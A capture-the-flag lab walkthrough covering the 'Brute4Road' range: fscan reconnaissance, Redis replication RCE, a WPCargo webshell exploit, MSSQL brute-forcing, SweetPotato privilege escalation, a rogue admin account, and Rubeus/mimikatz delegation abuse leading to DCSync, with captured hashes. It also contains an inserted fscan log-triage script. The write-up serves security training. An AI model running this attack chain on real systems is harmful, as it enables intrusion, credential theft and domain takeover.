春秋云镜-Brute4Road

  1. FLAG1&FLAG2
  2. FLAG3
  3. FLAG4

FLAG1&FLAG2

Start with an fscan scan of the target.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# ../pentest/fscan/fscan2 -h 39.99.231.184
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-04-15 02:37:33] [INFO] 暴力破解线程数: 1
[2025-04-15 02:37:33] [INFO] 开始信息扫描
[2025-04-15 02:37:33] [INFO] 最终有效主机数量: 1
[2025-04-15 02:37:33] [INFO] 开始主机扫描
[2025-04-15 02:37:33] [INFO] 有效端口数量: 233
[2025-04-15 02:37:33] [SUCCESS] 端口开放 39.99.231.184:6379
[2025-04-15 02:37:33] [SUCCESS] 端口开放 39.99.231.184:80
[2025-04-15 02:37:33] [SUCCESS] 端口开放 39.99.231.184:21
[2025-04-15 02:37:33] [SUCCESS] 端口开放 39.99.231.184:22
[2025-04-15 02:37:33] [SUCCESS] 服务识别 39.99.231.184:21 => [ftp] 版本:3.0.2 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.2).]
[2025-04-15 02:37:34] [SUCCESS] 服务识别 39.99.231.184:22 => [ssh] 版本:7.4 产品:OpenSSH 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.4.]
[2025-04-15 02:37:38] [SUCCESS] 服务识别 39.99.231.184:6379 => [redis] 版本:5.0.12 产品:Redis key-value store
[2025-04-15 02:37:39] [SUCCESS] 服务识别 39.99.231.184:80 => [http] 版本:1.20.1 产品:nginx
[2025-04-15 02:37:43] [INFO] 存活端口数量: 4
[2025-04-15 02:37:43] [INFO] 开始漏洞扫描
[2025-04-15 02:37:43] [INFO] 加载的插件: ftp, redis, ssh, webpoc, webtitle
[2025-04-15 02:37:43] [SUCCESS] 网站标题 http://39.99.231.184 状态码:200 长度:4833 标题:Welcome to CentOS
[2025-04-15 02:37:44] [SUCCESS] 匿名登录成功!
[2025-04-15 02:37:46] [SUCCESS] Redis 39.99.231.184:6379 发现未授权访问 文件位置:/usr/local/redis/db/dump.rdb
[2025-04-15 02:37:50] [SUCCESS] Redis无密码连接成功: 39.99.231.184:6379
[2025-04-15 02:37:53] [SUCCESS] 扫描已完成: 5/5

Exploit Redis master-slave replication to get RCE. The flag is under /home/redis/flag, but the current user has no permission to read it; base64 has the SUID bit set, so it can be used to read the file.

/usr/bin/base64 ./flag01|/usr/bin/base64 -d

The FTP service only exposes a pub folder with nothing useful in it. Upload fscan and scan the internal network.

./fscan -h 172.22.2.7/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-04-15 15:22:58] [INFO] 暴力破解线程数: 1
[2025-04-15 15:22:58] [INFO] 开始信息扫描
[2025-04-15 15:22:58] [INFO] CIDR范围: 172.22.2.0-172.22.2.255
[2025-04-15 15:22:58] [INFO] 生成IP范围: 172.22.2.0.%!d(string=172.22.2.255) - %!s(MISSING).%!d(MISSING)
[2025-04-15 15:22:58] [INFO] 解析CIDR 172.22.2.7/24 -> IP范围 172.22.2.0-172.22.2.255
[2025-04-15 15:22:58] [INFO] 最终有效主机数量: 256
[2025-04-15 15:22:58] [INFO] 开始主机扫描
[2025-04-15 15:22:58] [INFO] 正在尝试无监听ICMP探测...
[2025-04-15 15:22:58] [INFO] 当前用户权限不足,无法发送ICMP包
[2025-04-15 15:22:58] [INFO] 切换为PING方式探测...
[2025-04-15 15:22:58] [SUCCESS] 目标 172.22.2.3 存活 (ICMP)
[2025-04-15 15:22:58] [SUCCESS] 目标 172.22.2.7 存活 (ICMP)
[2025-04-15 15:22:58] [SUCCESS] 目标 172.22.2.16 存活 (ICMP)
[2025-04-15 15:22:58] [SUCCESS] 目标 172.22.2.18 存活 (ICMP)
[2025-04-15 15:22:59] [SUCCESS] 目标 172.22.2.34 存活 (ICMP)
[2025-04-15 15:23:04] [INFO] 存活主机数量: 5
[2025-04-15 15:23:04] [INFO] 有效端口数量: 233
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.3:88
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.18:80
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.16:80
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.7:80
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.18:22
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.7:22
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.7:21
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.18:139
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.16:139
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.34:135
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.16:135
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.3:139
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.3:135
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.34:445
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.18:445
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.16:445
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.3:445
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.3:389
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.34:139
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.16:1433
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.7:6379
[2025-04-15 15:23:05] [SUCCESS] 服务识别 172.22.2.18:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-15 15:23:05] [SUCCESS] 服务识别 172.22.2.7:22 => [ssh] 版本:7.4 产品:OpenSSH 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.4.]
[2025-04-15 15:23:05] [SUCCESS] 服务识别 172.22.2.7:21 => [ftp] 版本:3.0.2 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.2).]
[2025-04-15 15:23:09] [SUCCESS] 服务识别 172.22.2.3:88 =>
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.16:80 => [http] 版本:2.0 产品:Microsoft HTTPAPI httpd 系统:Windows
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.7:80 => [http] 版本:1.20.1 产品:nginx
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.16:139 => Banner:[.]
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.3:139 => Banner:[.]
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.18:80 => [http]
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.34:445 =>
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.16:445 =>
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.3:445 =>
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.3:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.34:139 => Banner:[.]
[2025-04-15 15:23:10] [SUCCESS] 服务识别 172.22.2.16:1433 => [ms-sql-s] 版本:13.00.4001; SP1 产品:Microsoft SQL Server 2016 系统:Windows Banner:[.%.]
[2025-04-15 15:24:05] [SUCCESS] 服务识别 172.22.2.18:139 =>
[2025-04-15 15:24:05] [SUCCESS] 服务识别 172.22.2.18:445 =>
[2025-04-15 15:24:05] [SUCCESS] 服务识别 172.22.2.7:6379 =>
[2025-04-15 15:24:10] [SUCCESS] 服务识别 172.22.2.34:135 =>
[2025-04-15 15:24:10] [SUCCESS] 服务识别 172.22.2.16:135 =>
[2025-04-15 15:24:10] [SUCCESS] 服务识别 172.22.2.3:135 =>
[2025-04-15 15:24:10] [INFO] 存活端口数量: 21
[2025-04-15 15:24:10] [INFO] 开始漏洞扫描
[2025-04-15 15:24:10] [INFO] 加载的插件: findnet, ftp, ldap, ms17010, mssql, netbios, redis, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-15 15:24:10] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.34
主机名: CLIENT01
发现的网络接口:
IPv4地址:
└─ 172.22.2.34
[2025-04-15 15:24:10] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.3
主机名: DC
发现的网络接口:
IPv4地址:
└─ 172.22.2.3
[2025-04-15 15:24:10] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.2.16
主机名: MSSQLSERVER
发现的网络接口:
IPv4地址:
└─ 172.22.2.16
[2025-04-15 15:24:10] [INFO] 系统信息 172.22.2.3 [Windows Server 2016 Datacenter 14393]
[2025-04-15 15:24:10] [SUCCESS] NetBios 172.22.2.34 XIAORANG\CLIENT01
[2025-04-15 15:24:10] [SUCCESS] 网站标题 http://172.22.2.16 状态码:404 长度:315 标题:Not Found
[2025-04-15 15:24:10] [SUCCESS] 网站标题 http://172.22.2.7 状态码:200 长度:4833 标题:Welcome to CentOS
[2025-04-15 15:24:10] [SUCCESS] NetBios 172.22.2.3 DC:DC.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-04-15 15:24:10] [SUCCESS] NetBios 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393
[2025-04-15 15:24:10] [INFO] 系统信息 172.22.2.16 [Windows Server 2016 Datacenter 14393]
[2025-04-15 15:24:10] [SUCCESS] NetBios 172.22.2.18 WORKGROUP\UBUNTU-WEB02
[2025-04-15 15:24:10] [SUCCESS] 172.22.2.34 CVE-2020-0796 SmbGhost Vulnerable
[2025-04-15 15:24:10] [SUCCESS] 匿名登录成功!
[2025-04-15 15:24:10] [SUCCESS] SMB认证成功 172.22.2.18:445 administrator:123456
[2025-04-15 15:24:10] [INFO] SMB2共享信息 172.22.2.18:445 administrator Pass:123456 共享:[print$ IPC$]
[2025-04-15 15:24:10] [SUCCESS] 网站标题 http://172.22.2.18 状态码:200 长度:57738 标题:又一个WordPress站点
[2025-04-15 15:24:12] [INFO] SMB2共享信息 172.22.2.16:445 admin Pass:123456 共享:[ADMIN$ C$ fileshare IPC$]
[2025-04-15 15:24:18] [SUCCESS] SMB认证成功 172.22.2.16:445 admin:123456
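As an added defender-side example that is not part of the original write-up, the following Python script triages fscan 2.0.0 output like the two scans above: it parses SUCCESS lines, groups findings by host and ranks hosts by their worst finding. The sample lines are copied from the scans above; the rule table keyed on fscan's Chinese log markers and the severity labels are my own assumptions, not part of fscan.

```python
import re
from collections import defaultdict
# Constructed sample: lines copied from the two fscan 2.0.0 runs in this write-up.
SAMPLE_LOG = """\
[2025-04-15 02:37:33] [SUCCESS] 端口开放 39.99.231.184:6379
[2025-04-15 02:37:46] [SUCCESS] Redis 39.99.231.184:6379 发现未授权访问 文件位置:/usr/local/redis/db/dump.rdb
[2025-04-15 15:23:04] [SUCCESS] 端口开放 172.22.2.7:80
[2025-04-15 15:24:10] [SUCCESS] 匿名登录成功!
[2025-04-15 15:24:10] [SUCCESS] 172.22.2.34 CVE-2020-0796 SmbGhost Vulnerable
[2025-04-15 15:24:10] [SUCCESS] SMB认证成功 172.22.2.18:445 administrator:123456
[2025-04-15 15:24:10] [INFO] 存活端口数量: 21
"""
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] (?P<msg>.*)$")
HOST_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?")
# (marker fscan prints in the message, finding label, severity); first match wins
RULES = [
    ("发现未授权访问", "unauthenticated-access", "high"),  # e.g. Redis without auth
    ("SMB认证成功", "weak-credential", "high"),            # guessed SMB password
    ("Vulnerable", "known-cve", "high"),                   # e.g. CVE-2020-0796
    ("匿名登录成功", "anonymous-login", "medium"),         # anonymous FTP
    ("端口开放", "open-port", "info"),
]
SEVERITY_RANK = {"high": 0, "medium": 1, "info": 2}

def parse_line(line):
    """Return a finding dict for a SUCCESS line that matches a rule, else None."""
    m = LINE_RE.match(line.strip())
    if not m or m.group("level") != "SUCCESS":
        return None
    msg = m.group("msg")
    h = HOST_RE.search(msg)
    host = h.group(1) if h else "unknown"  # fscan omits the host on some lines
    port = int(h.group(2)) if h and h.group(2) else None
    for marker, label, severity in RULES:
        if marker in msg:
            return {"host": host, "port": port, "finding": label, "severity": severity}
    return None

def triage(log_text):
    """Group findings by host; hosts whose worst finding is most severe come first."""
    by_host = defaultdict(list)
    for line in log_text.splitlines():
        finding = parse_line(line)
        if finding:
            by_host[finding["host"]].append(finding)
    worst = lambda fs: min(SEVERITY_RANK[f["severity"]] for f in fs)
    return sorted(by_host.items(), key=lambda kv: worst(kv[1]))

def high_risk_hosts(log_text):
    return [h for h, fs in triage(log_text) if any(f["severity"] == "high" for f in fs)]
```

Feed it the full scan log (for example `triage(open("fscan.log", encoding="utf-8").read())`) to get the hosts that need remediation first.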

The scan turns up a lot, so go through the hosts one by one. Port 80 on 172.22.2.18 is a WordPress site; scan it with wpscan.

[i] Plugin(s) Identified:

[+] wpcargo
| Location: http://172.22.2.18/wp-content/plugins/wpcargo/
| Last Updated: 2024-08-08T17:00:00.000Z
| [!] The version is out of date, the latest version is 7.0.6
|
| Found By: Urls In Homepage (Passive Detection)
|
| [!] 6 vulnerabilities identified:
|
| [!] Title: WPCargo < 6.9.0 - Unauthenticated RCE
| Fixed in: 6.9.0
| References:
| - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25003
|
| [!] Title: WPCargo Track & Trace < 6.9.5 - Reflected Cross Site Scripting
| Fixed in: 6.9.5
| References:
| - https://wpscan.com/vulnerability/d5c6f894-6ad1-46f4-bd77-17ad9234cfc3
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1436
|
| [!] Title: WPCargo Track & Trace < 6.9.5 - Admin+ Stored Cross Site Scripting
| Fixed in: 6.9.5
| References:
| - https://wpscan.com/vulnerability/ef5aa8a7-23a7-4ce0-bb09-d9c986386114
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1435
|
| [!] Title: WPCargo Track & Trace <= 7.0.6 - Unauthenticated SQL Injection
| References:
| - https://wpscan.com/vulnerability/f5fdb762-cbc1-4352-9ab2-cbba9d3d33e2
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44004
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e725ec0-4897-4ba7-a803-80e8aafacbd1
|
| [!] Title: WPCargo Track & Trace <= 7.0.6 - Missing authorization to Authenticated (Subscriber+) Settings Update
| References:
| - https://wpscan.com/vulnerability/b433fff9-b501-4fb3-9f04-5e18b64b0a90
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-54271
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/0c467a78-1ba4-4c0d-84e6-db54fc1b0c63
|
| [!] Title: WPCargo Track & Trace <= 7.0.6 - Authenticated (Contributor+) Insecure Direct Object Reference
| References:
| - https://wpscan.com/vulnerability/594ae221-06b6-4bc2-b5b6-0f9bac880f7b
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31609
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/887ecedb-0bc8-4488-b6fa-27cfa22345e6
|
| Version: 6.x.x (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://172.22.2.18/wp-content/plugins/wpcargo/readme.txt

The wpcargo plugin is installed, and it has an RCE vulnerability: https://github.com/biulove0x/CVE-2021-25003

┌──(root㉿kali)-[~/Desktop/tmp]
└─# python3 2 -t "http://172.22.2.18/"
[proxychains] DLL init: proxychains-ng 4.17

############################################
# @author : biulove0x #
# @name : WP Plugins WPCargo Exploiter #
# @cve : CVE-2021-25003 #
############################################

[proxychains] Strict chain ... 192.168.11.1:9999 ... 172.22.2.18:80 ... OK
[-] http://172.22.2.18/wp-content/wp-conf.php => Uploaded!

Connect with AntSword (蚁剑), which gives access to the database password.

flag2 is in the database.

FLAG3

Another table contains a large number of passwords.

This is the password list for the MSSQL database on 172.22.2.16, so brute-force it. The default MSSQL username is sa; the exported entries have leading spaces, so strip them first.

└─# grep -P "\w+" pass -o >2
└─# hydra -l sa -P pass 172.22.2.16 mssql -f -I -vV
[1433][mssql] host: 172.22.2.16 login: sa password: ElGNkOiC

Then connect with MDUT.

Upload SweetPotato.exe and escalate privileges.

flag03 is under C:\Users\Administrator\flag\

C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a "type C:\Users\Administrator\flag\flag03.txt"

FLAG4

netstat -ano shows that 3389 is listening.

TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       692
TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       2680
TCP    0.0.0.0:2383           0.0.0.0:0              LISTENING       2932
TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       812

Add a user.

C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a "net user lv Asd123123 /add"
C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a "net localgroup administrators lv /add"

Then log in over Remote Desktop.

The host is domain-joined. Upload mimikatz first to extract hashes; uploading BloodHound reveals that constrained delegation is configured.

The hash obtained for the domain account is cea3e66a2715c71423e7d3f0ff6cd352.

Use Rubeus to request a TGT for the machine account MSSQLSERVER$. After it runs, you get the Base64-encoded TGT.

Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:cea3e66a2715c71423e7d3f0ff6cd352 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

Then use the S4U2Self extension to request, on behalf of the domain administrator Administrator, a ticket for the domain controller's LDAP service, and pass the resulting ticket into memory.

Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:[base64(ticket.kirbi)]

The LDAP service carries DCSync rights, so the hashes of domain users can be dumped.

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

The domain admin hash obtained is 1a19251fbd935969832616366ae3fe62.

With it, you can log in to the DC over WMI; the flag is under C:\Users\Administrator\flag.
